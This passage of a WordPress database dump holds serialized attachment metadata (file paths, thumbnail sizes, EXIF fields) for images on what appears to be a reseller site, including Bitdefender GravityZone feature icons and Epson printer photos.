5:{s:5:\"width\";i:921;s:6:\"height\";i:751;s:4:\"file\";s:45:\"2018/12/MONITOR-NETWORK-AND-USER-ACTIVITY.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"MONITOR-NETWORK-AND-USER-ACTIVITY-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"MONITOR-NETWORK-AND-USER-ACTIVITY-300x245.png\";s:5:\"width\";i:300;s:6:\"height\";i:245;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:45:\"MONITOR-NETWORK-AND-USER-ACTIVITY-768x626.png\";s:5:\"width\";i:768;s:6:\"height\";i:626;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:45:\"MONITOR-NETWORK-AND-USER-ACTIVITY-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:45:\"MONITOR-NETWORK-AND-USER-ACTIVITY-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:45:\"MONITOR-NETWORK-AND-USER-ACTIVITY-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2909,2408,'_wp_attached_file','2018/12/ENFORCE-CORPORATE-POLICIES.png'),(2910,2408,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:390;s:6:\"height\";i:355;s:4:\"file\";s:38:\"2018/12/ENFORCE-CORPORATE-POLICIES.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"ENFORCE-CORPORATE-POLICIES-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"ENFORCE-CORPORATE-POLICIES-300x273.png\";s:5:\"width\";i:300;s:6:\"height\";i:273;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:38:\"ENFORCE-CORPORATE-POLICIES-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:38:\"ENFORCE-CORPORATE-POLICIES-390x300.png\";s:5:\"width\";i:390;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2911,2409,'_wp_attached_file','2018/12/Protect-Against-Web-Based-Threats.png'),(2912,2409,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:455;s:6:\"height\";i:250;s:4:\"file\";s:45:\"2018/12/Protect-Against-Web-Based-Threats.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Protect-Against-Web-Based-Threats-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Protect-Against-Web-Based-Threats-300x165.png\";s:5:\"width\";i:300;s:6:\"height\";i:165;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:45:\"Protect-Against-Web-Based-Threats-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2913,2410,'_wp_attached_file','2018/12/SECURE-LAPTOPS-AND-MOBILE-DEVICES.png'),(2914,2410,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:422;s:6:\"height\";i:329;s:4:\"file\";s:45:\"2018/12/SECURE-LAPTOPS-AND-MOBILE-DEVICES.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"SECURE-LAPTOPS-AND-MOBILE-DEVICES-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"SECURE-LAPTOPS-AND-MOBILE-DEVICES-300x234.png\";s:5:\"width\";i:300;s:6:\"height\";i:234;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:45:\"SECURE-LAPTOPS-AND-MOBILE-DEVICES-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:45:\"SECURE-LAPTOPS-AND-MOBILE-DEVICES-422x300.png\";s:5:\"width\";i:422;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2915,2411,'_wp_attached_file','2018/12/SIMPLIFY-MANAGEMENT.png'),(2916,2411,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:297;s:6:\"height\";i:287;s:4:\"file\";s:31:\"2018/12/SIMPLIFY-MANAGEMENT.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"SIMPLIFY-MANAGEMENT-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:31:\"SIMPLIFY-MANAGEMENT-297x150.png\";s:5:\"width\";i:297;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2917,2413,'_wp_attached_file','2018/12/bitdefender-gravityzone-ultra-Copy.png'),(2918,2413,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:100;s:6:\"height\";i:100;s:4:\"file\";s:46:\"2018/12/bitdefender-gravityzone-ultra-Copy.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2919,2414,'_wp_attached_file','2018/12/bitdefender-gravityzone-elite-Copy.png'),(2920,2414,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:100;s:6:\"height\";i:100;s:4:\"file\";s:46:\"2018/12/bitdefender-gravityzone-elite-Copy.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2921,2415,'_wp_attached_file','2018/12/bitdefender-gravityzone-enterprise-Copy.png'),(2922,2415,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:100;s:6:\"height\";i:100;s:4:\"file\";s:51:\"2018/12/bitdefender-gravityzone-enterprise-Copy.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2923,2417,'_wp_attached_file','2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg'),(2924,2417,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:48:\"2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Epson-WorkForce-Enterprise-WF-C17590-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"Epson-WorkForce-Enterprise-WF-C17590-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:48:\"Epson-WorkForce-Enterprise-WF-C17590-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:48:\"Epson-WorkForce-Enterprise-WF-C17590-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:46:\"Epson-WorkForce-Enterprise-WF-C17590-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2925,2418,'_wp_attached_file','2018/12/Epson-WorkForce-Pro-WF-C5290.png'),(2926,2418,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:40:\"2018/12/Epson-WorkForce-Pro-WF-C5290.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"Epson-WorkForce-Pro-WF-C5290-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"Epson-WorkForce-Pro-WF-C5290-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:40:\"Epson-WorkForce-Pro-WF-C5290-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:40:\"Epson-WorkForce-Pro-WF-C5290-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:38:\"Epson-WorkForce-Pro-WF-C5290-20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2927,2419,'_wp_attached_file','2018/12/Epson-WorkForce-WF-100.png'),(2928,2419,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:34:\"2018/12/Epson-WorkForce-WF-100.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"Epson-WorkForce-WF-100-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"Epson-WorkForce-WF-100-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:34:\"Epson-WorkForce-WF-100-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:34:\"Epson-WorkForce-WF-100-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:32:\"Epson-WorkForce-WF-100-20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2929,2420,'_wp_attached_file','2018/12/Epson-WorkForce-WF-7711.png'),(2930,2420,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:35:\"2018/12/Epson-WorkForce-WF-7711.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"Epson-WorkForce-WF-7711-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"Epson-WorkForce-WF-7711-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:35:\"Epson-WorkForce-WF-7711-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:35:\"Epson-WorkForce-WF-7711-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:33:\"Epson-WorkForce-WF-7711-20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2931,2421,'_wp_attached_file','2018/12/Epson-EcoTank-L3150-.jpg'),(2932,2421,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:32:\"2018/12/Epson-EcoTank-L3150-.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"Epson-EcoTank-L3150--150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"Epson-EcoTank-L3150--300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:32:\"Epson-EcoTank-L3150--300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:32:\"Epson-EcoTank-L3150--480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:30:\"Epson-EcoTank-L3150--20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2933,2422,'_wp_attached_file','2018/12/Epson-L120-Printer.png'),(2934,2422,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:30:\"2018/12/Epson-L120-Printer.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Epson-L120-Printer-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Epson-L120-Printer-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:30:\"Epson-L120-Printer-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:30:\"Epson-L120-Printer-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:28:\"Epson-L120-Printer-20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2935,2423,'_wp_attached_file','2018/12/Epson-M1100-Printer-.png'),(2936,2423,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:32:\"2018/12/Epson-M1100-Printer-.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"Epson-M1100-Printer--150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"Epson-M1100-Printer--300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:32:\"Epson-M1100-Printer--300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:32:\"Epson-M1100-Printer--480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:30:\"Epson-M1100-Printer--20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2937,2424,'_wp_attached_file','2018/12/Epson-AcuLaser-C9300N.png'),(2938,2424,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:33:\"2018/12/Epson-AcuLaser-C9300N.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"Epson-AcuLaser-C9300N-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"Epson-AcuLaser-C9300N-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:33:\"Epson-AcuLaser-C9300N-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:33:\"Epson-AcuLaser-C9300N-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:31:\"Epson-AcuLaser-C9300N-20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2941,2426,'_wp_attached_file','2018/12/Epson-WorkForce-AL-M320DN-.jpg'),(2942,2426,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1015;s:6:\"height\";i:686;s:4:\"file\";s:38:\"2018/12/Epson-WorkForce-AL-M320DN-.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"Epson-WorkForce-AL-M320DN--150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"Epson-WorkForce-AL-M320DN--300x203.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:203;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"Epson-WorkForce-AL-M320DN--768x519.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:519;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:38:\"Epson-WorkForce-AL-M320DN--300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:38:\"Epson-WorkForce-AL-M320DN--480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:38:\"Epson-WorkForce-AL-M320DN--640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:36:\"Epson-WorkForce-AL-M320DN--20x14.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:14;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"14\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D810\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1489487760\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"85\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2943,2427,'_wp_attached_file','2018/12/Epson-WorkForce-AL-M8100DN-.png'),(2944,2427,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:39:\"2018/12/Epson-WorkForce-AL-M8100DN-.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"Epson-WorkForce-AL-M8100DN--150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"Epson-WorkForce-AL-M8100DN--300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:39:\"Epson-WorkForce-AL-M8100DN--300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:39:\"Epson-WorkForce-AL-M8100DN--480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:37:\"Epson-WorkForce-AL-M8100DN--20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_le